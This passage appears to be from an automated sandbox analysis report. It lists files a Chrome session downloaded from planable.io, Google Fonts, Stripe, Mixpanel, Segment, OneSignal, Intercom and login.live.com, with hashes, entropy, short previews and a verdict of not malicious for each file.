                                                                                                                                                                              Preview:wOF2......W...........W6..........................b..X..P.`?STATH..4..............r..,..6.$..T. ..~.. ......7pnS.U\w"M1.....8.v.P...hD.I.p....Br2F.4...?(."YF.Te...9.(...H.7v"w=y....k..L..IC\.e....;..eG....n:.3..O..SS...6.i+..O&%..$../..'.z.+...}.P.E.n.Xp..G'..G}..?.+(r..@....%.".6.E.h.....%."....l....<..N./.Bv2.,.UDP...r.X..sz....GH.I..C.. .@B(jmQm.iMF.&.8..PV.&.*..:oWQ.....o..>Ge..be.FQ3..........M.u.D..8D.8.C...C4A,F.BT.>.v.u.igi..'S.MD.G9..A..H...b.w.....uP..+......$....j.......H.......r.q.q..RY.r.K]...|d.(R.H.~ .. P.4.>M..P..|n.u...TWv.......Y.c.rl.D.0b......Z..N......;...?....$'L.d. ...(...4....p.${u..98}.L.65...i|.TiC.{.....F.].d..5O...'M+o...._m..Q..R....~.....X..{B..Rt\G....].j..B......p...R.N<......We5.L..l..,..@J..!C.R. 4...:.=._...,)G.u.{?.....y.......?Y~;EXz...f..&...K2./dC....~...U..~w.&.r.G..Hs..~.:....'......."..... c#T.89PM%3+...!..0...r....K.d4.4........c<!.&.1n.e./.Y.$...3.&...?......6.[P.B:!@H.....n.o....x.... tt..........8A...
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 22652, version 1.0
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):22652
                                                                                                                                                                              Entropy (8bit):7.990531604442822
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:496A19DB9637D6ACD0FC59A04635E888
                                                                                                                                                                              SHA1:12CF6F5138219B1571119DE3249BF9FB43EFB54C
                                                                                                                                                                              SHA-256:A02009D2F95D79B62B95C6DE12D6614BDB36BFFA6D4E756DB81EC1C51C5ACC34
                                                                                                                                                                              SHA-512:A65062A20111579638D554671408123922A263C34D4517635ADA8F8C4BD7429DC59D84763A2AC15B0BDB666E1F3583F543809830B1CD11D97FE13C15D8A67C8E
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://fonts.gstatic.com/s/satisfy/v21/rP2Hp2yn6lkG50LoCZOIHQ.woff2
                                                                                                                                                                              Preview:wOF2......X|..........X .........................`..~....a.....`.....,..6.$..T..,. ..V..c.......];.@w....(.(J%.FQ.$+...?#A...q...je....Ye=.h.N[XU.......7...%l.......2.c...o..Cy>.Q..V(..o.+.<....).{~.......e.........Z.#49.NT..=...<.U\b...f......0$O..j...[.(V...... JX...K.*........^..Q..........+_?...:.+.. B......!.. {X....v....ES^..0...=M.....r..v.rP..(.._.v..1...$..-.t..Q....t..U..?.'.C b..X.+...pB....:W.$..[..<.pp...r...d~..}m..A...?.n.?.t.B..{......'"....F.@.I ..T..$.J.|.R.wn*WnC*.,8..M..w...........rF.a?.9...._z......C..z...5..%..-Y...'R"..._..O)].(..0..2}Y).R.y.|.Q.....>...%.e%..U)NE8...0.....+U.t.,%pwk......^.>r&rA....f....P.....w\.....$r....;.(r-...[k2[..?.4...M..(.<.....O.=.;9@..Z,.....%j..j..#.a...........j...N ..7.U?Gf|m.`.. ....J.5.|....u......p......5('..p+.6.mt.8..&\..n.....|_.....~...z..W.;....-.i..r.o.w...o.../..1$.A......p...h.v..."M%.G}.z......>M......V...'.-^.r.....+.....u.&$+.Yg....e.......j....N8Xx[....*T..).~6n.ig..S.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (28228)
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):28277
                                                                                                                                                                              Entropy (8bit):5.210847083904635
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:4E4E40C0CCC652A7CC4CEF7C2146C1F5
                                                                                                                                                                              SHA1:45B78F7C8687B680DAE7B6A09FB1B9CBEA7C2D34
                                                                                                                                                                              SHA-256:C664E784D6CBA355616EA0A6EB59603579A7B0E49FC4B9595264BA736AECCB4D
                                                                                                                                                                              SHA-512:98C8AFDBC62EE4C50927F1B4C988436FA4D38F57AA76B400C9B2098A3A10797A345EA15AC779C1C0A02285C83372F641E8480C70175575ED719D4FF573F1FBA3
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://segment.planable.io/next-integrations/actions/845/449cd4534726259c2a8c.js
                                                                                                                                                                              Preview:(self.webpackChunkDestination=self.webpackChunkDestination||[]).push([[845],{1291:(e,t,r)=>{"use strict";const n=r(6150),o=r(6086);class a extends Error{constructor(e){if(!Array.isArray(e))throw new TypeError("Expected input to be an Array, got "+typeof e);let t=(e=[...e].map((e=>e instanceof Error?e:null!==e&&"object"==typeof e?Object.assign(new Error(e.message),e):new Error(e)))).map((e=>"string"==typeof e.stack?o(e.stack).replace(/\s+at .*aggregate-error\/index.js:\d+:\d+\)?/g,""):String(e))).join("\n");t="\n"+n(t,4),super(t),this.name="AggregateError",Object.defineProperty(this,"_errors",{value:e})}*[Symbol.iterator](){for(const e of this._errors)yield e}}e.exports=a},6086:(e,t,r)=>{"use strict";const n=r(1209),o=/\s+at.*(?:\(|\s)(.*)\)?/,a=/^(?:(?:(?:node|(?:internal\/[\w/]*|.*node_modules\/(?:babel-polyfill|pirates)\/.*)?\w+)\.js:\d+:\d+)|native)/,s=void 0===n.homedir?"":n.homedir();e.exports=(e,t)=>(t=Object.assign({pretty:!1},t),e.replace(/\\/g,"/").split("\n").filter((e=>{cons
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (3450), with CRLF line terminators
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):3452
                                                                                                                                                                              Entropy (8bit):5.117912766689607
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:CB06E9A552B197D5C0EA600B431A3407
                                                                                                                                                                              SHA1:04E167433F2F1038C78F387F8A166BB6542C2008
                                                                                                                                                                              SHA-256:1F4EDBD2416E15BD82E61BA1A8E5558D44C4E914536B1B07712181BF57934021
                                                                                                                                                                              SHA-512:1B4A3919E442EE4D2F30AE29B1C70DF7274E5428BCB6B3EDD84DCB92D60A0D6BDD9FA6D9DDE8EAB341FF4C12DE00A50858BF1FC5B6135B71E9E177F5A9ED34B9
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://login.live.com/Me.htm?v=3
                                                                                                                                                                              Preview:<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s*(\w+)\s*=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p||s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 190152
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):61052
                                                                                                                                                                              Entropy (8bit):7.996159932827634
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:C1E82BF71ADD622AD0F3BF8572F634FC
                                                                                                                                                                              SHA1:6CA863D4CAB96669202548D301693B3F5F80B0D5
                                                                                                                                                                              SHA-256:BA48AF15D297DB450DC4870242482145ADDB2D18375A4871C490429E2DC5464A
                                                                                                                                                                              SHA-512:820A7F8A0C8EA33A8FE1E90CDC35F45DC1E143E836B0D8EA047E1E312F8CAEC72CDEE4E7DB54760A4D749CD0ACFE103A27E39A9A56EB2D704E448A67B0D0C079
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:...........iw.F.0.....'W...4)/qH#..D.L.EK...................().}.{..@.z........Qz.,..Ox.....i4..S.&.p......9..W....);a.].a....Y......Y<,.n..."`Is....5....P..|.-..x1.F...@...yRlG.O..5.Q.|.gy.c.^....r.EC.....xd.oL..$./..|3.......r^.j.}...M... )x.D.....%.....B..t....vZ....2L......px.G.1.*.lZYh...$.....,.../.a..;Q...._..#.....e.T.:trA_.0.:.f...........(I.x?.S...<7...o..0.`r.x.+.2..o+...4/..vzY7.C'.....!.r..4n....]P.+a..........._.8,..G>...{.4B....o.9.....r......X3..U.....'.0.@...lrX....r.W\e...].}....(.l......=........3....S..........^=D..[.zw6..e...<WQ.w.(.X..S....>.^.....^B..O-.(..U.R;h..v.......4.Dc .?..z....r.._.Y......M.a.?,...?..U.....OF.w\h$.Q..5....Q.Oj ....5U..8..Y......gYZM....y..OrY.z]B..y..;o.....oT.r...H..{K...Y&Q.......*..W....N4.......].0m..m........E.bc..~..e.. .nzS.i3^......).,Y}.=1H...... V...g.)....X..G...C....@o,.i.~...as...ehEH....u9l.2...y\J.?.(.I.q%..F#..D../>pr$...,...m.6..:,<s..~S.fl;k.'<..}z.Y.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 20612, version 1.0
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):20612
                                                                                                                                                                              Entropy (8bit):7.987601598791172
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:B07DA7AA3E4F363C5CDBC11312239E8C
                                                                                                                                                                              SHA1:47BF5B2F24EA4A4CAAFCCC89B9D2A6677EF9E3B8
                                                                                                                                                                              SHA-256:E44C11F4834BDD4D6B6DA7B8EE5EAEBC8ACB41250CD6BCE5CC82EA8262140EAA
                                                                                                                                                                              SHA-512:420729406B315D8AF34B62B78F39E763F5CF33CBF94467457B393FDE0573DD7FFC6A23F25680988F9B82A4A3B719876FF76F3E1DB047CE82615F544FC3A82532
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://fonts.gstatic.com/s/roboto/v47/KFOMCnqEu92Fr1ME7kSn66aGLdTylUAMQXC89YmC2DPNWubEbVmUiAo.woff2
                                                                                                                                                                              Preview:wOF2......P........P..P..............................6..t.`?STAT^..B..~........`..i..X..6.$..,. ..x. ..N.F.%...q.6...@n.%.....BYG......7...G.....8...l'D&.0..9.....%.d.p..f-.2JE."I...N.`.....M.R.....9...6iO.^.....<.3.>.....qQ9..f...+4.L...2z..i......6..m....Qs.%.l....7.I:&..$b..4R.5...*.h..Y5.<...........,..X....q.6...7b.8GTO F.Eb.....].!@.:.4..$...*5.*Fu.2R.i.0w.....6m.c...NTd...-.@.......FMs.&...6.]..1.k]...n.......`.|..(fO.hKE$/s!...~....e..UM..Zr....r.C..&J......S@..../.rH..a..h..<..?...1.v....y..+d1.:1...U....$...Vd....L......:.=...l.U.y..M..)..A.J.x/O.q....t...[{..Y.=.D...WU.P.j.2I.d........o.*._-yZ^..ul-z.0H.....g.A.......R.e..dyA..${H.8.....9".=.e<`....BN9Nv7;. .....P5...4..-cL.1-.&..Z.h..W-`.w...eG....X.X..Xju...\.BV....jNU....<|-...r.!Y.d....O....2..ovP....B2H....N(.>t...:IJ.;..r....p'...!..{dt,.8..J.._.;.[.....L...P..B.,F....k._c......(qg.....c.Gq........|Z.V.5.=....X.....2|.>...7D&..+...bH.<H.|H.BH..H.rH.jH.zH...!Ga......(&."K5......`c
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (8302)
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):8342
                                                                                                                                                                              Entropy (8bit):5.195964507038842
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:BC588E33EE41052C9E412FA5BF1228B6
                                                                                                                                                                              SHA1:C06B8041069576AA47CF54E53D18C7DB42EF13D9
                                                                                                                                                                              SHA-256:75BCE8973450B6F9872CD0E0B14CDAC748331748D262E1894BFBD822D998A3B9
                                                                                                                                                                              SHA-512:AFD7105F9F3C308671AA02C13B1EA82CD5334B919B644A3F4E15E3A481DA90E70070DC5289FFAC13C94A08B0C83654A3836D44FBB66E7FD97D05DACA7D74791F
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://segment.planable.io/next-integrations/integrations/mixpanel/3.2.1/mixpanel.dynamic.js.gz
                                                                                                                                                                              Preview:window['mixpanelDeps'] = ["/integrations/vendor/commons.a61d7bea37d2de5d4b69.js"];window['mixpanelLoader'] = function() { return window.mixpanelIntegration=function(e){function t(t){for(var o,a,p=t[0],s=t[1],l=t[2],u=0,f=[];u<p.length;u++)a=p[u],Object.prototype.hasOwnProperty.call(r,a)&&r[a]&&f.push(r[a][0]),r[a]=0;for(o in s)Object.prototype.hasOwnProperty.call(s,o)&&(e[o]=s[o]);for(c&&c(t);f.length;)f.shift()();return i.push.apply(i,l||[]),n()}function n(){for(var e,t=0;t<i.length;t++){for(var n=i[t],o=!0,p=1;p<n.length;p++){var s=n[p];0!==r[s]&&(o=!1)}o&&(i.splice(t--,1),e=a(a.s=n[0]))}return e}var o={},r={85:0},i=[];function a(t){if(o[t])return o[t].exports;var n=o[t]={i:t,l:!1,exports:{}};return e[t].call(n.exports,n,n.exports,a),n.l=!0,n.exports}a.m=e,a.c=o,a.d=function(e,t,n){a.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},a.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.definePropert
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):126097
                                                                                                                                                                              Entropy (8bit):4.3878413472526505
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:BE0695FB4E7615CE95C8D8F15071E179
                                                                                                                                                                              SHA1:2FEBC1AD5AB35401332E1BC07ED468DE46A6E587
                                                                                                                                                                              SHA-256:31CE6AAF14155F214FCAC32228ACB560B40E4FC0FB954EA27EBC6ADFCC6601C4
                                                                                                                                                                              SHA-512:BCC0069BD74512D56D8B5CB02938895E6C46BE04237466316442E68C14E13C270FE83F8D86DE18DA4C9C47A7297405985947A3FF677B6CE3B6DB0762832B5B30
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://app.planable.io/sprite-1734038972103.svg
                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="0" height="0">.<defs>.<symbol id="arrowUpCircled-12"><path fill-rule="evenodd" d="M1 6a5 5 0 1 1 10 0A5 5 0 0 1 1 6m5.442-2.442a.625.625 0 0 0-.884 0l-2 2a.625.625 0 0 0 .884.884l.933-.933V8a.625.625 0 0 0 1.25 0V5.509l.933.933a.625.625 0 1 0 .884-.884z"/></symbol>.<symbol id="check-12"><path fill-rule="evenodd" d="M11.051 2.992a.75.75 0 0 1-.042 1.06l-6.5 6a.75.75 0 0 1-1.085-.072l-2.5-3a.75.75 0 0 1 1.152-.96l1.995 2.394 5.92-5.465a.75.75 0 0 1 1.06.043"/></symbol>.<symbol id="media-12"><path fill-rule="evenodd" d="M3.5.75A2.75 2.75 0 0 0 .75 3.5v5a2.75 2.75 0 0 0 2.75 2.75h5a2.75 2.75 0 0 0 2.75-2.75v-5A2.75 2.75 0 0 0 8.5.75zM2.25 3.5c0-.69.56-1.25 1.25-1.25h5c.69 0 1.25.56 1.25 1.25v4.683L7.83 6.51a1.25 1.25 0 0 0-1.658.014L2.814 9.545A1.25 1.25 0 0 1 2.25 8.5zm2.25 2a1 1 0 1 0 0-2 1 1 0 0 0 0 2"/></symbol>.<symbol id="playFilled-12"><path fill-rule="eve
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65529), with no line terminators
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):88793
                                                                                                                                                                              Entropy (8bit):5.413865382969959
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:FD35981A337052CD3CCD82DC674FF76D
                                                                                                                                                                              SHA1:E11E8DF31D4748D5348ECEC37C01C4DA1549F321
                                                                                                                                                                              SHA-256:BD6E71E0A8F18B3DD4BBEB6FD673015FEC896BD92E17C11F3DC8FE96A06DE1F4
                                                                                                                                                                              SHA-512:9D7A20899C255FC008683F2DCAFDA6332B19B56CA88850661F25245DC4844059404D7D2FEE7C4249775ABA92A61F4870393FCCBAE8A74B12463CF903F05143E3
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://m.stripe.network/out-4.5.44.js
                                                                                                                                                                              Preview:var StripeM=function(e){var t={};function n(r){if(t[r])return t[r].exports;var _=t[r]={i:r,l:!1,exports:{}};return e[r].call(_.exports,_,_.exports,n),_.l=!0,_.exports}return n.m=e,n.c=t,n.d=function(e,t,r){n.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:r})},n.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},n.t=function(e,t){if(1&t&&(e=n(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var r=Object.create(null);if(n.r(r),Object.defineProperty(r,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var _ in e)n.d(r,_,function(t){return e[t]}.bind(null,_));return r},n.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return n.d(t,"a",t),t},n.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},n.p="",n(n.s=30)}([function(e,t,n){"use strict";(function(e){n.d(t,"a",(function(){retur
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (9163)
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):9204
                                                                                                                                                                              Entropy (8bit):5.214444859222514
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:09282956186C8515EF0D208902803581
                                                                                                                                                                              SHA1:EA83B81C9955B3E983A7BEF75714A9CEFA904151
                                                                                                                                                                              SHA-256:EC8B1B07980996F574075E1B7E895D5D47794B9DCF345A68D60FBB17034F7BEF
                                                                                                                                                                              SHA-512:39BF696C593E20BD86AE8994EB8E767B6C7FA6FA029F94B5DBC145CC30DC9460BCD5544F0182A79E4BEFC85DF960B30DC53D7B435DB24463F0E91D82FAA4CD10
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://cdn.onesignal.com/sdks/OneSignalSDK.js
                                                                                                                                                                              Preview:!function(e){var t={};function n(o){if(t[o])return t[o].exports;var r=t[o]={i:o,l:!1,exports:{}};return e[o].call(r.exports,r,r.exports,n),r.l=!0,r.exports}n.m=e,n.c=t,n.d=function(e,t,o){n.o(e,t)||Object.defineProperty(e,t,{configurable:!1,enumerable:!0,get:o})},n.r=function(e){Object.defineProperty(e,"__esModule",{value:!0})},n.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return n.d(t,"a",t),t},n.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},n.p="",n(n.s=8)}([function(e,t,n){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.OneSignalStub=void 0;var o=function(){function e(t){var n=this;this.VERSION=Number(151606),this.log={setLevel:function(e){n.currentLogLevel=e}},this.setupStubFunctions(e.FUNCTION_LIST_TO_STUB,this.stubFunction,t),this.setupStubFunctions(e.FUNCTION_LIST_WITH_PROMISE_TO_STUB,this.stubPromiseFunction,t)}return e.prototype.setupStubFunctions=function(e,t,n){for(var o=this,r=function(e){if(n.ind
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (607)
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):62012
                                                                                                                                                                              Entropy (8bit):5.3308855453734365
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:99E54FC5DC8DF56A8CAF484E35C93949
                                                                                                                                                                              SHA1:6AEDEF0F1B1D8B6350769433F07FA6EE9F290D73
                                                                                                                                                                              SHA-256:9E7A0215F52ACD7A420CCEE95705322EA9AD8CA563E5B641E6838529E433724E
                                                                                                                                                                              SHA-512:51A4BB6132412A8E1D17A245810DB8C872BE2F8D7E9B57D0E39704E3DAAF348B63E5E218C4DB755732DED579BE30467FFBC479D651363B60119B97E2E77C9186
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://cdn.mxpnl.com/libs/mixpanel-2-latest.min.js
                                                                                                                                                                              Preview:(function() {.var j=void 0,l=!0,r=null,B=!1;.(function(){function Ua(){function a(){if(!a.Rc)ua=a.Rc=l,va=B,c.a(G,function(a){a.Ec()})}function b(){try{t.documentElement.doScroll("left")}catch(d){setTimeout(b,1);return}a()}if(t.addEventListener)"complete"===t.readyState?a():t.addEventListener("DOMContentLoaded",a,B);else if(t.attachEvent){t.attachEvent("onreadystatechange",a);var d=B;try{d=p.frameElement===r}catch(f){}t.documentElement.doScroll&&d&&b()}c.gc(p,"load",a,l)}function Va(){x.init=function(a,b,d){if(d)return x[d]||(x[d]=G[d]=W(a,.b,d),x[d].ra()),x[d];d=x;if(G.mixpanel)d=G.mixpanel;else if(a)d=W(a,b,"mixpanel"),d.ra(),G.mixpanel=d;x=d;1===ia&&(p.mixpanel=x);Wa()}}function Wa(){c.a(G,function(a,b){"mixpanel"!==b&&(x[b]=a)});x._=c}function ja(a){a=c.g(a)?a:c.e(a)?{}:{days:a};return c.extend({},Xa,a)}function W(a,b,d){var f,g="mixpanel"===d?x:x[d];if(g&&0===ia)f=g;else{if(g&&!c.isArray(g)){o.error("You have already initialized "+d);return}f=new e}f.vb={};f.ba(a,b,d);f.people=new
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):942400
                                                                                                                                                                              Entropy (8bit):5.570041823897551
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:901F303FC9AEF9D636606E4688AFF4F8
                                                                                                                                                                              SHA1:2F9FE766BCF5C641CE24866E7E12EFBA631BB883
                                                                                                                                                                              SHA-256:4A2B97FE062D3BC0A95C5C422A65C8BC6A8DC10F77CAEDE751CF9C9900CB2BD5
                                                                                                                                                                              SHA-512:4964FC079C28DBED2F698DC96CFBCECCF96D81A3A2EB763692472DED55399DE260D04FF12AEDA1795AE8FA546C3AA788E6718BAA90CE876B4BF5878C20B2FC71
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:!function(){function e(t){var n=i[t];if(void 0!==n)return n.exports;var r=i[t]={id:t,loaded:!1,exports:{}};return a[t](r,r.exports,e),r.loaded=!0,r.exports}var t,n,r,a={94184:function(e,t){var n;!function(){"use strict";function r(){for(var e=[],t=0;t<arguments.length;t++){var n=arguments[t];if(n){var i=typeof n;if("string"===i||"number"===i)e.push(n);else if(Array.isArray(n)&&n.length){var o=r.apply(null,n);o&&e.push(o)}else if("object"===i)for(var s in n)a.call(n,s)&&n[s]&&e.push(s)}}return e.join(" ")}var a={}.hasOwnProperty;e.exports?(r.default=r,e.exports=r):void 0===(n=function(){return r}.apply(t,[]))||(e.exports=n)}()},62322:function(e,t,n){e.exports=n.p+"fingerprinted/data/countryRanges-da252f255fed0fefce3e3b3c60707e3d.json"},8464:function(e,t,n){e.exports=n.p+"fingerprinted/data/countries_ar-7995ee218dfd37546f754bd73b67e2cc.json"},90342:function(e,t,n){e.exports=n.p+"fingerprinted/data/countries_bg-c9f7496faecf6cafdeb3cf831b179cc8.json"},32726:function(e,t,n){e.exports=n.p+"f
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:gzip compressed data, from Unix, original size modulo 2^32 734507
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):175099
                                                                                                                                                                              Entropy (8bit):7.997991044549037
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:D06E107C11B87ADEA793554CE5AE94A4
                                                                                                                                                                              SHA1:9BBC5E8DD2680B2554EB1D1980698A56E9EA6CF0
                                                                                                                                                                              SHA-256:882C6D3D580B53E3DD5579C7C6FCE85F514C1377C0D33494DB16C142BCA15BB1
                                                                                                                                                                              SHA-512:5E0D69631FA691D596DA9711D967E35172FE31C7458A17F5C75ACE13D2A6E066228FB869EC0CECBDB4FD0E1707788D4C33333A7EE35FD08C361811B1B87EDF70
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://js.intercomcdn.com/vendors~app~tooltips.454c2578.js
                                                                                                                                                                              Preview:...........iW.W.0.......Zj..<&.e..C.4..p..C..R..$.R*...s.<.3c..3.3.......8.3t..N.3.I....w.{......RI.$..u...).:.>........}I.....?($...I..(...^.... $]...I..7...."I^E.....r.8|....A{..syYv......5(xK..Bq.w.g...._.d..+z;.....K.6{ .,.^.t.........9.(.....U.]...I....D...:~U....O.\W_I;z.a.8..-!..".n..<_...V...D...d) .J.U.,EEB...y...}{C.c_Z....'s2....bn.K....sY...Y.....BIE...A....t......B.p..C.7.]&..=...hs=.L.y3.$..J.9..QS.....&.Hn../K.')..t.....XPQ....m.2.t.b@...._u......>......ZP.b.B.UN...\bh.'[.B..p[...6..R.K<....Bi._*..g..h6.y.n....9U..........8L...=..J.YJ~.M...k..ZPP.../.3.mV..Z.\.......:z.f...B...^+}.b.p........RHq.{y....K?....).....~X.w...W[d'R..X..mN./.$..E..y.#.%.p1.L...H~..@.j7..........A.|&.X..6..?:g..L..]8..#].>...eU\2....^X..?..p...Tc..q.(.\..<@...^"K>.0...3....;.#..~.....V.0|V..G...G[U.l....8.c....V.e^@Br.h...R..x...N.%;q........l...A.x.+.K...B....jk.....\A..X>.Q0B..yW..r..'.Zv..b.m'L.;...a.....I.SY...s.2..>....w..+.yqH..x[...,...rA...^
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):17
                                                                                                                                                                              Entropy (8bit):3.734521664779752
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:8C814C47925E9B2FF056DFA7D3690CC8
                                                                                                                                                                              SHA1:4183EC6DCFA17F9BAA7A00977D01B96AC302D801
                                                                                                                                                                              SHA-256:2070E9EC5EA66461693A174CF782EFA1090E0CA1988968CC1115D019E7B80A95
                                                                                                                                                                              SHA-512:520EAFF3DB32D70ACD5F450446D46BE2BBC7EE66E6BBBB8D23F938265E001F8FBD22604EE8BD5BD2C10D5D78B3F01F9C435579DEFDD746E6A871A2D107C7E89B
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://sdk.split.io/api/mySegments/f4hjM2uYpW3sKk7YR
                                                                                                                                                                              Preview:{"mySegments":[]}
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (1572)
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):33063
                                                                                                                                                                              Entropy (8bit):5.472887048147243
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:C6ABF0C23A60F6352F044FCE5B7CC1E4
                                                                                                                                                                              SHA1:A344539DEFFE11BCE81CBB069A2BBE6FDC7BDEED
                                                                                                                                                                              SHA-256:9C53F12F97E43BCC9136E922C0A8961D550CB1E714C71AD29284A5DB416A5482
